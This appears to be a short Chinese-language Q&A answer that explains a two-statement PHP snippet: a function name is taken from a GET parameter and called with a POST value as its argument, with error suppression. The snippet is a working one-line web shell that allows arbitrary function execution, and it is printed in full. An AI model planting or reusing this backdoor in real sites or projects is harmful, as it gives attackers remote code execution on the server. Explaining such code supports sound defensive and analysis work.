说明

>将具有键“2”的GET变量存储在名为$_的变量中.由于PHP的打字类型很差,我们不需要在数字上引用引号.

$_=@$_GET[2]

>将$_作为可调用函数名称,并以$_POST [1]作为第一个参数执行.

@$_($_POST[1])

@运算符应该禁止错误日志记录,请参见PHP.net: Error Control Operators.

两个语句之间的并置运算符实际上并不重要.它可以这样重写：

$_=@$_GET[2];
@$_($_POST[1]);

用例

调用任意函数.我不会提到成功攻击的特定HTTP标头,但对于每个(web)程序员来说,这应该是相当容易的.